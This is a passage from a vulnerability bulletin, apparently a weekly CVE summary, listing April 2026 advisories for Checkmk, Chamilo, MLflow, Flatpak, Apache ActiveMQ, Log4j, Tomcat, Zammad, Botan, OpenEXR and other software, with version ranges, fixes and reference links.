ed Java object as the jato.clientSession GET/POST parameter to any JATO Vie= wBean endpoint whose JSP contains <jato:form> tags (e.g., the Password Rese=
t pages). This vulnerability is fixed in 16.0.6. 2026-04-07 not yet calcula= ted CVE-2026-33439 [ https://www.cve.org/CVERecord?id=3DCVE-2026-33439 ] ht= tps://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-2cqq-= rpvq-g5qj
=C2=A0 Checkmk GmbH--Checkmk Livestatus injection in the monitoring quickse= arch in Checkmk <2.5.0b4 allows an authenticated attacker to inject livesta= tus commands via the search query due to insufficient input sanitization in=
search filter plugins. 2026-04-10 not yet calculated CVE-2026-33455 [ http= s://www.cve.org/CVERecord?id=3DCVE-2026-33455 ] https://checkmk.com/werk/17= 988
=C2=A0 Checkmk GmbH--Checkmk Livestatus injection in the notification test = mode in Checkmk <2.5.0b4 and <2.4.0p26 allows an authenticated user with ac= cess to the notification test page to inject arbitrary Livestatus commands = via a crafted service description. 2026-04-10 not yet calculated CVE-2026-3= 3456 [ https://www.cve.org/CVERecord?id=3DCVE-2026-33456 ] https://checkmk.= com/werk/17989
=C2=A0 Checkmk GmbH--Checkmk Livestatus injection in the prediction graph p= age in Checkmk <2.5.0b4, <2.4.0p26, and <2.3.0p47 allows an authenticated u= ser to inject arbitrary Livestatus commands via a crafted service name para= meter due to insufficient sanitization of the service description value. 20= 26-04-10 not yet calculated CVE-2026-33457 [ https://www.cve.org/CVERecord?= id=3DCVE-2026-33457 ] https://checkmk.com/werk/17990
=C2=A0 chamilo--chamilo-lms Chamilo LMS is a learning management system. Pr= ior to 1.11.38, a chained attack can enable otherwise-blocked PHP code from=
the main/install/ directory and allow an unauthenticated attacker to modif=
y existing files or create new files where allowed by system permissions. T= his only affects portals with the main/install/ directory still present and=
read-accessible. This vulnerability is fixed in 1.11.38. 2026-04-10 not ye=
t calculated CVE-2026-33698 [ https://www.cve.org/CVERecord?id=3DCVE-2026-3= 3698 ] https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-557g= -2w66-gpmf https://github.com/chamilo/chamilo-lms/commit/d3355d7873c7e5b907c5fa84cbd5d= 9b62ed33e51
=C2=A0 chamilo--chamilo-lms Chamilo LMS is a learning management system. Pr= ior to 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) vulnerability=
in the /social-network/personal-data/{userId} endpoint allows any authenti= cated user to access full personal data and API tokens of arbitrary users b=
y modifying the userId parameter. This results in mass disclosure of sensit= ive user information and credentials, enabling a full platform data breach.=
This vulnerability is fixed in 2.0.0-RC.3. 2026-04-10 not yet calculated C= VE-2026-33703 [ https://www.cve.org/CVERecord?id=3DCVE-2026-33703 ] https:/= /github.com/chamilo/chamilo-lms/security/advisories/GHSA-27x6-c5c7-gpf5
=C2=A0 Go standard library--crypto/x509 When verifying a certificate chain = containing excluded DNS constraints, these constraints are not correctly ap= plied to wildcard DNS SANs which use a different case than the constraint. = This only affects validation of otherwise trusted certificate chains, issue=
d by a root CA in the VerifyOptions.Roots CertPool, or in the system certif= icate pool. 2026-04-08 not yet calculated CVE-2026-33810 [ https://www.cve.= org/CVERecord?id=3DCVE-2026-33810 ] https://go.dev/cl/763763 https://go.dev/issue/78332 https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU https://pkg.go.dev/vuln/GO-2026-4866
=C2=A0 github.com/jackc/pgx/v5--github.com/jackc/pgx/v5/pgproto3 Memory-saf= ety vulnerability in github.com/jackc/pgx/v5. 2026-04-07 not yet calculated=
CVE-2026-33815 [ https://www.cve.org/CVERecord?id=3DCVE-2026-33815 ] https= ://pkg.go.dev/vuln/GO-2026-4771
=C2=A0 github.com/jackc/pgx/v5--github.com/jackc/pgx/v5/pgproto3 Memory-saf= ety vulnerability in github.com/jackc/pgx/v5. 2026-04-07 not yet calculated=
CVE-2026-33816 [ https://www.cve.org/CVERecord?id=3DCVE-2026-33816 ] https= ://pkg.go.dev/vuln/GO-2026-4772
=C2=A0 Mlflow--Mlflow MLflow is vulnerable to Stored Cross-Site Scripting (= XSS) caused by unsafe parsing of YAML-based MLmodel artifacts in its web in= terface. An authenticated attacker can upload a malicious MLmodel file cont= aining a payload that executes when another user views the artifact in the = UI. This allows actions such as session hijacking or performing operations =
on behalf of the victim. This issue affects MLflow version through 3.10.1 2= 026-04-07 not yet calculated CVE-2026-33865 [ https://www.cve.org/CVERecord= ?id=3DCVE-2026-33865 ] https://github.com/mlflow/mlflow/pull/21435 https://cert.pl/en/posts/2026/04/CVE-2026-33865/ https://afine.com/blogs/attacking-mlflow-how-ml-artifacts-become-attack-vec= tors
=C2=A0 Mlflow--Mlflow MLflow is vulnerable to an authorization bypass affec= ting the AJAX endpoint used to download saved model artifacts. Due to missi=
ng access=E2=80=91control validation, a user without permissions to a given=
experiment can directly query this endpoint and retrieve model artifacts t= hey are not authorized to access. This issue affects MLflow version through=
3.10.1 2026-04-07 not yet calculated CVE-2026-33866 [ https://www.cve.org/= CVERecord?id=3DCVE-2026-33866 ] https://github.com/mlflow/mlflow/pull/21708 https://cert.pl/en/posts/2026/04/CVE-2026-33865/ https://afine.com/blogs/attacking-mlflow-how-ml-artifacts-become-attack-vec= tors
=C2=A0 Apache Software Foundation--Apache OpenMeetings Use of GET Request M= ethod With Sensitive Query Strings vulnerability in Apache OpenMeetings. Th=
e REST login endpoint uses HTTP GET method with username and password passe=
d as query parameters.=C2=A0Please check references regarding possible impa=
ct This issue affects Apache OpenMeetings: from 3.1.3 before 9.0.0. Users a=
re recommended to upgrade to version 9.0.0, which fixes the issue. 2026-04-=
09 not yet calculated CVE-2026-34020 [ https://www.cve.org/CVERecord?id=3DC= VE-2026-34020 ] https://owasp.org/www-community/vulnerabilities/Information= _exposure_through_query_strings_in_url https://lists.apache.org/thread/2h3h9do5tp17xldr0nps1yjmkx4vs3db
=C2=A0 flatpak--flatpak Flatpak is a Linux application sandboxing and distr= ibution framework. Prior to 1.16.4, the Flatpak portal accepts paths in the=
sandbox-expose options which can be app-controlled symlinks pointing at ar= bitrary paths. Flatpak run mounts the resolved host path in the sandbox. Th=
is gives apps access to all host files and can be used as a primitive to ga=
in code execution in the host context. This vulnerability is fixed in 1.16.=
4. 2026-04-07 not yet calculated CVE-2026-34078 [ https://www.cve.org/CVERe= cord?id=3DCVE-2026-34078 ] https://github.com/flatpak/flatpak/security/advi= sories/GHSA-cc2q-qc34-jprg
=C2=A0 flatpak--flatpak Flatpak is a Linux application sandboxing and distr= ibution framework. Prior to 1.16.4, the caching for ld.so removes outdated = cache files without properly checking that the app controlled path to the o= utdated cache is in the cache directory. This allows Flatpak apps to delete=
arbitrary files on the host. This vulnerability is fixed in 1.16.4. 2026-0= 4-07 not yet calculated CVE-2026-34079 [ https://www.cve.org/CVERecord?id= =3DCVE-2026-34079 ] https://github.com/flatpak/flatpak/security/advisories/= GHSA-p29x-r292-46pp
=C2=A0 flatpak--xdg-dbus-proxy xdg-dbus-proxy is a filtering proxy for D-Bu=
s connections. Prior to 0.1.7, a policy parser vulnerability allows bypassi=
ng eavesdrop restrictions. The proxy checks for eavesdrop=3Dtrue in policy = rules but fails to handle eavesdrop =3D'true' (with a space before the equa=
ls sign) and similar cases. Clients can intercept D-Bus messages they shoul=
d not have access to. This vulnerability is fixed in 0.1.7. 2026-04-07 not = yet calculated CVE-2026-34080 [ https://www.cve.org/CVERecord?id=3DCVE-2026= -34080 ] https://github.com/flatpak/xdg-dbus-proxy/security/advisories/GHSA= -vjp5-hjfm-7677
=C2=A0 Hydrosystem--Control System Hydrosystem Control System does not enfo= rce authorization for some directories. This allows an unauthorized attacke=
r to read all files in these directories and even execute some of them. Cri= tically the attacker could run PHP scripts directly on the connected databa= se.This issue was fixed in=C2=A0Hydrosystem Control System version=C2=A09.8=
.5 2026-04-09 not yet calculated CVE-2026-34184 [ https://www.cve.org/CVERe= cord?id=3DCVE-2026-34184 ] https://cert.pl/posts/2026/04/CVE-2026-4901/ https://www.hydrosystem.poznan.pl/
=C2=A0 Hydrosystem--Control System Hydrosystem Control System is vulnerable=
to SQL Injection across most scripts and input parameters. Because no prot= ections are in place, an authenticated attacker can inject arbitrary SQL co= mmands, potentially gaining full control over the database.This issue was f= ixed in Hydrosystem Control System version 9.8.5 2026-04-09 not yet calcula= ted CVE-2026-34185 [ https://www.cve.org/CVERecord?id=3DCVE-2026-34185 ] ht= tps://cert.pl/posts/2026/04/CVE-2026-4901/
https://www.hydrosystem.poznan.pl/
=C2=A0 Apache Software Foundation--Apache ActiveMQ Broker Improper Input Va= lidation, Improper Control of Generation of Code ('Code Injection') vulnera= bility in Apache ActiveMQ Broker, Apache ActiveMQ. Apache ActiveMQ Classic = exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. Th=
e default Jolokia access policy permits exec operations on all ActiveMQ MBe= ans (org.apache.activemq:*), including BrokerService.addNetworkConnector(St= ring) and BrokerService.addConnector(String). An authenticated attacker can=
invoke these operations with a crafted discovery URI that triggers the VM = transport's brokerConfig parameter to load a remote Spring XML application = context using ResourceXmlApplicationContext. Because Spring's ResourceXmlAp= plicationContext instantiates all singleton beans before the BrokerService = validates the configuration, arbitrary code execution occurs on the broker'=
s JVM through bean factory methods such as Runtime.exec(). This issue affec=
ts Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 before 6.2.3; Apache A= ctiveMQ All: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ: befor=
e 5.19.4, from 6.0.0 before 6.2.3. Users are recommended to upgrade to vers= ion 5.19.4 or 6.2.3, which fixes the issue 2026-04-07 not yet calculated CV= E-2026-34197 [ https://www.cve.org/CVERecord?id=3DCVE-2026-34197 ] https://= activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt =C2=A0 nyariv--SandboxJS SandboxJS is a JavaScript sandboxing library. Prio=
r to 0.8.36, the @nyariv/sandboxjs parser contains unbounded recursion in t=
he restOfExp function and the lispify/lispifyExpr call chain. An attacker c=
an crash any Node.js process that parses untrusted input by supplying deepl=
y nested expressions (e.g., ~2000 nested parentheses), causing a RangeError=
: Maximum call stack size exceeded that terminates the process. This vulner= ability is fixed in 0.8.36. 2026-04-06 not yet calculated CVE-2026-34211 [ = https://www.cve.org/CVERecord?id=3DCVE-2026-34211 ] https://github.com/nyar= iv/SandboxJS/security/advisories/GHSA-8pfc-jjgw-6g26
=C2=A0 nyariv--SandboxJS SandboxJS is a JavaScript sandboxing library. Prio=
r to 0.8.36, a scope modification vulnerability exists in @nyariv/sandboxjs=
. The vulnerability allows untrusted sandboxed code to leak internal interp= reter objects through the new operator, exposing sandbox scope objects in t=
he scope hierarchy to untrusted code; an unexpected and undesired exploit. = While this could allow modifying scopes inside the sandbox, code evaluation=
remains sandboxed and prototypes remain protected throughout the execution=
. This vulnerability is fixed in 0.8.36. 2026-04-06 not yet calculated CVE-= 2026-34217 [ https://www.cve.org/CVERecord?id=3DCVE-2026-34217 ] https://gi= thub.com/nyariv/SandboxJS/security/advisories/GHSA-hg73-4w7g-q96w
=C2=A0 zammad--zammad Zammad is a web based open source helpdesk/customer s= upport system. Prior to 7.0.1, customers in shared organizations (means the=
y can see each other's tickets) could see fields which are not intended for=
customers - including fields not intended for them at all (e.g. priority, = custom ticket attributes for internal purposes). This was the case when a c= ustomer opened a ticket from another user of the same shared organization. = They are not able to modify these field. This vulnerability is fixed in 7.0= .1. 2026-04-08 not yet calculated CVE-2026-34248 [ https://www.cve.org/CVER= ecord?id=3DCVE-2026-34248 ] https://github.com/zammad/zammad/security/advis= ories/GHSA-prww-84vh-w978
=C2=A0 Sonatype--Nexus Repository A reflected cross-site scripting vulnerab= ility exists in Sonatype Nexus Repository versions 3.0.0 through 3.90.2 tha=
t allows unauthenticated remote attackers to execute arbitrary JavaScript i=
n a victim's browser through a specially crafted URL. Exploitation requires=
user interaction. 2026-04-08 not yet calculated CVE-2026-3438 [ https://ww= w.cve.org/CVERecord?id=3DCVE-2026-3438 ] https://help.sonatype.com/en/sonat= ype-nexus-repository-3-91-0-release-notes.html https://support.sonatype.com/hc/en-us/articles/50609137161363
=C2=A0 scoder--lupa Lupa integrates the runtimes of Lua or LuaJIT2 into CPy= thon. In 2.6 and earlier, attribute_filter is not consistently applied when=
attributes are accessed through built-in functions like getattr and setatt=
r. This allows an attacker to bypass the intended restrictions and eventual=
ly achieve arbitrary code execution. 2026-04-06 not yet calculated CVE-2026= -34444 [ https://www.cve.org/CVERecord?id=3DCVE-2026-34444 ] https://github= .com/scoder/lupa/security/advisories/GHSA-69v7-xpr6-6gjm
=C2=A0 Python Software Foundation--CPython When calling base64.b64decode() =
or related functions the decoding process would stop after encountering the=
first padded quad regardless of whether there was more information to be p= rocessed. This can lead to data being accepted which may be processed diffe= rently by other implementations. Use "validate=3DTrue" to enable stricter p= rocessing of base64 data. 2026-04-10 not yet calculated CVE-2026-3446 [ htt= ps://www.cve.org/CVERecord?id=3DCVE-2026-3446 ] https://github.com/python/c= python/pull/145267
https://github.com/python/cpython/issues/145264 https://mail.python.org/archives/list/security-announce@python.org/thread/F= 5ZT5ICGJ6CKXVUJ34YBVY7WOZ5SHG53/ https://github.com/python/cpython/commit/1f9958f909c1b41a4ffc0b613ef8ec8fa5= e7c474 https://github.com/python/cpython/commit/4561f6418a691b3e89aef0901f53fe0dfb= 7f7c0e https://github.com/python/cpython/commit/e31c55121620189a0d1a07b689762d8ca9= c1b7fa
=C2=A0 Apache Software Foundation--Apache Log4j Core The fix for CVE-2025-6= 8161 https://logging.apache.org/security.html#CVE-2025-68161 was incomplete=
: it addressed hostname verification only when enabled via the log4j2.sslVe= rifyHostName https://logging.apache.org/log4j/2.x/manual/systemproperties.h= tml#log4j2.sslVerifyHostName system property, but not when configured throu=
gh the verifyHostName https://logging.apache.org/log4j/2.x/manual/appenders= /network.html#SslConfiguration-attr-verifyHostName attribute of the <Ssl> e= lement. Although the verifyHostName configuration attribute was introduced =
in Log4j Core 2.12.0, it was silently ignored in all versions through 2.25.=
3, leaving TLS connections vulnerable to interception regardless of the con= figured value. A network-based attacker may be able to perform a man-in-the= -middle attack when all of the following conditions are met: * An SMTP, Soc= ket, or Syslog appender is in use. * TLS is configured via a nested <Ssl> e= lement. * The attacker can present a certificate issued by a CA trusted by = the appender's configured trust store, or by the default Java trust store i=
f none is configured. This issue does not affect users of the HTTP appender=
, which uses a separate verifyHostname https://logging.apache.org/log4j/2.x= /manual/appenders/network.html#HttpAppender-attr-verifyHostName attribute t= hat was not subject to this bug and verifies host names by default. Users a=
re advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issu=
e. 2026-04-10 not yet calculated CVE-2026-34477 [ https://www.cve.org/CVERe= cord?id=3DCVE-2026-34477 ] https://github.com/apache/logging-log4j2/pull/40=
75
https://logging.apache.org/security.html#CVE-2026-34477 https://logging.apache.org/cyclonedx/vdr.xml https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfi= guration-attr-verifyHostName https://lists.apache.org/thread/lkx8cl46t2bvkcwfcb2pd43ygc097lq4
=C2=A0 Apache Software Foundation--Apache Log4j Core Apache Log4j Core's Rf= c5424Layout https://logging.apache.org/log4j/2.x/manual/layouts.html#RFC542= 4Layout , in versions 2.21.0 through 2.25.3, is vulnerable to log injection=
via CRLF sequences due to undocumented renames of security-relevant config= uration attributes. Two distinct issues affect users of stream-based syslog=
services who configure Rfc5424Layout directly: * The newLineEscape attribu=
te was silently renamed, causing newline escaping to stop working for users=
of TCP framing (RFC 6587), exposing them to CRLF injection in log output. =
* The useTlsMessageFormat attribute was silently renamed, causing users of = TLS framing (RFC 5425) to be silently downgraded to unframed TCP (RFC 6587)=
, without newline escaping. Users of the SyslogAppender are not affected, a=
s its configuration attributes were not modified. Users are advised to upgr= ade to Apache Log4j Core 2.25.4, which corrects this issue. 2026-04-10 not = yet calculated CVE-2026-34478 [ https://www.cve.org/CVERecord?id=3DCVE-2026= -34478 ] https://github.com/apache/logging-log4j2/pull/4074 https://logging.apache.org/security.html#CVE-2026-34478 https://logging.apache.org/cyclonedx/vdr.xml https://logging.apache.org/log4j/2.x/manual/layouts.html#RFC5424Layout https://lists.apache.org/thread/3k1clr2l6vkdnl4cbhjrnt1nyjvb5gwt
=C2=A0 Apache Software Foundation--Apache Log4j 1 to Log4j 2 bridge The Log= 4j1XmlLayout from the Apache Log4j 1-to-Log4j 2 bridge fails to escape char= acters forbidden by the XML 1.0 standard, producing malformed XML output. C= onforming XML parsers are required to reject documents containing such char= acters with a fatal error, which may cause downstream log processing system=
s to drop or fail to index affected records. Two groups of users are affect= ed: * Those using Log4j1XmlLayout directly in a Log4j Core 2 configuration = file. * Those using the Log4j 1 configuration compatibility layer with org.= apache.log4j.xml.XMLLayout specified as the layout class. Users are advised=
to upgrade to Apache Log4j 1-to-Log4j 2 bridge version 2.25.4, which corre= cts this issue. Note: The Apache Log4j 1-to-Log4j 2 bridge is deprecated an=
d will not be present in Log4j 3. Users are encouraged to consult the Log4j=
1 to Log4j 2 migration guide https://logging.apache.org/log4j/2.x/migrate-= from-log4j1.html , and specifically the section on eliminating reliance on = the bridge. 2026-04-10 not yet calculated CVE-2026-34479 [ https://www.cve.= org/CVERecord?id=3DCVE-2026-34479 ] https://github.com/apache/logging-log4j= 2/pull/4078
https://logging.apache.org/security.html#CVE-2026-34479 https://logging.apache.org/cyclonedx/vdr.xml https://logging.apache.org/log4j/2.x/migrate-from-log4j1.html https://lists.apache.org/thread/gd0hp6mj17rn3kj279vgy4p7kd4zz5on
=C2=A0 Apache Software Foundation--Apache Log4j Core Apache Log4j Core's Xm= lLayout https://logging.apache.org/log4j/2.x/manual/layouts.html#XmlLayout =
, in versions up to and including 2.25.3, fails to sanitize characters forb= idden by the XML 1.0 specification https://www.w3.org/TR/xml/#charsets prod= ucing invalid XML output whenever a log message or MDC value contains such = characters. The impact depends on the StAX implementation in use: * JRE bui= lt-in StAX: Forbidden characters are silently written to the output, produc= ing malformed XML. Conforming parsers must reject such documents with a fat=
al error, which may cause downstream log-processing systems to drop the aff= ected records. * Alternative StAX implementations (e.g., Woodstox https://g= ithub.com/FasterXML/woodstox , a transitive dependency of the Jackson XML D= ataformat module): An exception is thrown during the logging call, and the = log event is never delivered to its intended appender, only to Log4j's inte= rnal status logger. Users are advised to upgrade to Apache Log4j Core 2.25.=
4, which corrects this issue by sanitizing forbidden characters before XML = output. 2026-04-10 not yet calculated CVE-2026-34480 [ https://www.cve.org/= CVERecord?id=3DCVE-2026-34480 ] https://github.com/apache/logging-log4j2/pu= ll/4077
https://logging.apache.org/security.html#CVE-2026-34480 https://logging.apache.org/cyclonedx/vdr.xml https://logging.apache.org/log4j/2.x/manual/layouts.html#XmlLayout https://lists.apache.org/thread/5x0hcnng0chhghp6jgjdp3qmbbhfjzhb
=C2=A0 Apache Software Foundation--Apache Log4j JSON Template Layout Apache=
Log4j's JsonTemplateLayout https://logging.apache.org/log4j/2.x/manual/jso= n-template-layout.html , in versions up to and including 2.25.3, produces i= nvalid JSON output when log events contain non-finite floating-point values=
(NaN, Infinity, or -Infinity), which are prohibited by RFC 8259. This may = cause downstream log processing systems to reject or fail to index affected=
records. An attacker can exploit this issue only if both of the following = conditions are met: * The application uses JsonTemplateLayout. * The applic= ation logs a MapMessage containing an attacker-controlled floating-point va= lue. Users are advised to upgrade to Apache Log4j JSON Template Layout 2.25= .4, which corrects this issue. 2026-04-10 not yet calculated CVE-2026-34481=
[ https://www.cve.org/CVERecord?id=3DCVE-2026-34481 ] https://github.com/a= pache/logging-log4j2/pull/4080 https://logging.apache.org/security.html#CVE-2026-34481 https://logging.apache.org/cyclonedx/vdr.xml https://logging.apache.org/log4j/2.x/manual/json-template-layout.html https://lists.apache.org/thread/n34zdv00gbkdbzt2rx9rf5mqz6lhopcv
=C2=A0 Apache Software Foundation--Apache Tomcat Improper Encoding or Escap= ing of Output vulnerability in the JsonAccessLogValve component of Apache T= omcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.20, fr=
om 10.1.0-M1 through 10.1.53, from 9.0.40 through 9.0.116. Users are recomm= ended to upgrade to version 11.0.21, 10.1.54 or 9.0.117 , which fix the iss= ue. 2026-04-09 not yet calculated CVE-2026-34483 [ https://www.cve.org/CVER= ecord?id=3DCVE-2026-34483 ] https://lists.apache.org/thread/j1w7304yonlr8vo= 1tkb5nfs7od1y228b
=C2=A0 Apache Software Foundation--Apache Tomcat Missing Encryption of Sens= itive Data vulnerability in Apache Tomcat due to the=C2=A0fix for CVE-2026-= 29146 allowing the bypass of the EncryptInterceptor. This issue affects Apa= che Tomcat: 11.0.20, 10.1.53, 9.0.116. Users are recommended to upgrade to = version 11.0.21, 10.1.54 or 9.0.117, which fix the issue. 2026-04-09 not ye=
t calculated CVE-2026-34486 [ https://www.cve.org/CVERecord?id=3DCVE-2026-3= 4486 ] https://lists.apache.org/thread/9510k5p5zdvt9pkkgtyp85mvwxo2qrly
=C2=A0 Apache Software Foundation--Apache Tomcat Insertion of Sensitive Inf= ormation into Log File vulnerability in the cloud membership for clustering=
component of Apache Tomcat exposed the Kubernetes bearer token. This issue=
affects Apache Tomcat: from 11.0.0-M1 through 11.0.20, from 10.1.0-M1 thro= ugh 10.1.53, from 9.0.13 through 9.0.116. Users are recommended to upgrade =
to version 11.0.21, 10.1.54 or 9.0.117, which fix the issue. 2026-04-09 not=
yet calculated CVE-2026-34487 [ https://www.cve.org/CVERecord?id=3DCVE-202= 6-34487 ] https://lists.apache.org/thread/4xpkwolpkrj8v5xzp5nyovtlqp3y850h =C2=A0 Apache Software Foundation--Apache Tomcat CLIENT_CERT authentication=
does not fail as expected for some scenarios when soft fail is disabled an=
d FFM is used in Apache Tomcat. This issue affects Apache Tomcat: from 11.0= .0-M14 through 11.0.20, from 10.1.22 through 10.1.53, from 9.0.92 through 9= .0.116. Users are recommended to upgrade to version 11.0.21, 10.1.54 or 9.0= .117, which fixes the issue. 2026-04-09 not yet calculated CVE-2026-34500 [=
https://www.cve.org/CVERecord?id=3DCVE-2026-34500 ] https://lists.apache.o= rg/thread/7rcl4zdxryc8hy3htyfyxkbqpxjtfdl2
=C2=A0 Apache Software Foundation--Apache Airflow Apache Airflow versions 3= .0.0 through 3.1.8 DagRun wait endpoint returns XCom result values even to = users who only have DAG Run read permissions, such as the Viewer role.This = behavior conflicts with the FAB RBAC model, which treats XCom as a separate=
protected resource, and with the security model documentation that defines=
the Viewer role as read-only. Airflow uses the FAB Auth Manager to manage = access control on a per-resource basis. The Viewer role is intended to be r= ead-only by default, and the security model documentation defines Viewer us= ers as those who can inspect DAGs without accessing sensitive execution res= ults. Users are recommended to upgrade to Apache Airflow 3.2.0 which resolv=
es this issue. 2026-04-09 not yet calculated CVE-2026-34538 [ https://www.c= ve.org/CVERecord?id=3DCVE-2026-34538 ] https://github.com/apache/airflow/pu= ll/64415
https://lists.apache.org/thread/9mq3msqhmgjwdzbr6bgthj4brb3oz9fl
=C2=A0 randombit--botan Botan is a C++ cryptography library. In 3.11.0, the=
function Certificate_Store::certificate_known had a misleading name; it wo= uld return true if any certificate in the store had a DN (and subject key i= dentifier, if set) matching that of the argument. It did not check that the=
cert it found and the cert it was passed were actually the same certificat=
e. In 3.11.0 an extension of path validation logic was made which assumed t= hat certificate_known only returned true if the certificates were in fact i= dentical. The impact is that if an end entity certificate is presented, and=
its DN (and subject key identifier, if set) match that of any trusted root=
, the end entity certificate is accepted immediately as if it itself were a=
trusted root. , This vulnerability is fixed in 3.11.1. 2026-04-07 not yet = calculated CVE-2026-34580 [ https://www.cve.org/CVERecord?id=3DCVE-2026-345=
80 ] https://github.com/randombit/botan/security/advisories/GHSA-v782-6fq4-= q827
=C2=A0 randombit--botan Botan is a C++ cryptography library. Prior to versi=
on 3.11.1, the TLS 1.3 implementation allowed ApplicationData records to be=
processed prior to the Finished message being received. A server which is = attempting to enforce client authentication via certificates can by bypasse=
d by a client which entirely omits Certificate, CertificateVerify, and the = Finished message and instead sends application data records. This vulnerabi= lity is fixed in 3.11.1. 2026-04-07 not yet calculated CVE-2026-34582 [ htt= ps://www.cve.org/CVERecord?id=3DCVE-2026-34582 ] https://github.com/randomb= it/botan/security/advisories/GHSA-pxcj-9ppx-g86g
=C2=A0 AcademySoftwareFoundation--openexr OpenEXR provides the specificatio=
n and reference implementation of the EXR file format, an image storage for= mat for the motion picture industry. From 3.1.0 to before 3.2.7, 3.3.9, and=
3.4.9, internal_exr_undo_piz() advances the working wavelet pointer with s= igned 32-bit arithmetic. Because nx, ny, and wcount are int, a crafted EXR = file can make this product overflow and wrap. The next channel then decodes=
from an incorrect address. The wavelet decode path operates in place, so t= his yields both out-of-bounds reads and out-of-bounds writes. This vulnerab= ility is fixed in 3.2.7, 3.3.9, and 3.4.9. 2026-04-06 not yet calculated CV= E-2026-34588 [ https://www.cve.org/CVERecord?id=3DCVE-2026-34588 ] https://= github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-588r-= cr5c-w6hf https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.2.7 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.9 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9
=C2=A0 AcademySoftwareFoundation--openexr OpenEXR provides the specificatio=
n and reference implementation of the EXR file format, an image storage for= mat for the motion picture industry. From 3.2.0 to before 3.2.7, 3.3.9, and=
3.4.9, the DWA lossy decoder constructs temporary per-component block poin= ters using signed 32-bit arithmetic. For a large enough width, the calculat= ion overflows and later decoder stores operate on a wrapped pointer outside=
the allocated rowBlock backing store. This vulnerability is fixed in 3.2.7=
, 3.3.9, and 3.4.9. 2026-04-06 not yet calculated CVE-2026-34589 [ https://= www.cve.org/CVERecord?id=3DCVE-2026-34589 ] https://github.com/AcademySoftw= areFoundation/openexr/security/advisories/GHSA-p8xc-w3q4-h64x https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.2.7 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.9 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9
=C2=A0 Checkmk GmbH--Checkmk Insufficient sanitization of dashboard dashlet=
title links in Checkmk 2.2.0 (EOL), Checkmk 2.3.0 before 2.3.0p46, Checkmk=
2.4.0 before 2.4.0p25, and Checkmk 2.5.0 (beta) before 2.5.0b3 allows an a= ttacker with dashboard creation privileges to perform stored cross-site scr= ipting (XSS) attacks by tricking a victim into clicking a crafted dashlet t= itle link on a shared dashboard. 2026-04-07 not yet calculated CVE-2026-346=
6 [ https://www.cve.org/CVERecord?id=3DCVE-2026-3466 ] https://checkmk.com/= werk/19033 https://www.vulncheck.com/advisories/checkmk-stored-cross-site-scripting-in= -dashlet-title
=C2=A0 zammad--zammad Zammad is a web based open source helpdesk/customer s= upport system. Prior to 7.0.1 and 6.5.4, the HTML sanitizer for ticket arti= cles was missing proper sanitization of data: ... URI schemes, resulting in=
storing such malicious content in the database of the Zammad instance. The=
Zammad GUI is rendering this content, due to applied CSP rules no harm was=
done by e.g., clicking such a link. This vulnerability is fixed in 7.0.1 a=
nd 6.5.4. 2026-04-08 not yet calculated CVE-2026-34718 [ https://www.cve.or= g/CVERecord?id=3DCVE-2026-34718 ] https://github.com/zammad/zammad/security= /advisories/GHSA-c2cf-9fc7-jhf3
=C2=A0 zammad--zammad Zammad is a web based open source helpdesk/customer s= upport system. Prior to 7.0.1 and 6.5.4, the webhook model was missing a pr= oper validation for loop back addresses, or link-local addresses - only the=
URL scheme (HTTP/HTTPS) as well as the hostname was checked. This could en=
d up in retrieving confidential metadata of cloud/hosting providers. The ex= isting check is now extended and is applied when configuring webhooks as we=
ll as triggering webhook jobs. This vulnerability is fixed in 7.0.1 and 6.5= .4. 2026-04-08 not yet calculated CVE-2026-34719 [ https://www.cve.org/CVER= ecord?id=3DCVE-2026-34719 ] https://github.com/zammad/zammad/security/advis= ories/GHSA-2vgc-vfh2-rw75
=C2=A0 zammad--zammad Zammad is a web based open source helpdesk/customer s= upport system. Prior to 7.0.1 and 6.5.4, the SSO mechanism in Zammad was no=
t verifying the header originates from a trusted SSO proxy/gateway before a= pplying further actions on it. This vulnerability is fixed in 7.0.1 and 6.5= .4. 2026-04-08 not yet calculated CVE-2026-34720 [ https://www.cve.org/CVER= ecord?id=3DCVE-2026-34720 ] https://github.com/zammad/zammad/security/advis= ories/GHSA-hcv6-w4h9-p2p7
=C2=A0 zammad--zammad Zammad is a web based open source helpdesk/customer s= upport system. Prior to 7.0.1 and 6.5.4, the OAuth callback endpoints for M= icrosoft, Google, and Facebook external credentials do not validate a CSRF = state parameter. This vulnerability is fixed in 7.0.1 and 6.5.4. 2026-04-08=
not yet calculated CVE-2026-34721 [ https://www.cve.org/CVERecord?id=3DCVE= -2026-34721 ] https://github.com/zammad/zammad/security/advisories/GHSA-mfw= p-hx66-626c
=C2=A0 zammad--zammad Zammad is a web based open source helpdesk/customer s= upport system. Prior to 7.0.1 and 6.5.4, the used endpoint for ticket creat= ion was missing authorization if the related parameter for adding links is = used. This vulnerability is fixed in 7.0.1 and 6.5.4. 2026-04-08 not yet ca= lculated CVE-2026-34722 [ https://www.cve.org/CVERecord?id=3DCVE-2026-34722=
] https://github.com/zammad/zammad/security/advisories/GHSA-28m3-wwgv-ppw8 =C2=A0 zammad--zammad Zammad is a web based open source helpdesk/customer s= upport system. Prior to 7.0.1 and 6.5.4, unauthenticated remote attackers w= ere able to access the getting started endpoint to get access to sensitive = internal entity data, even after the system setup was completed. This vulne= rability is fixed in 7.0.1 and 6.5.4. 2026-04-08 not yet calculated CVE-202= 6-34723 [ https://www.cve.org/CVERecord?id=3DCVE-2026-34723 ] https://githu= b.com/zammad/zammad/security/advisories/GHSA-hcm9-ch62-5727
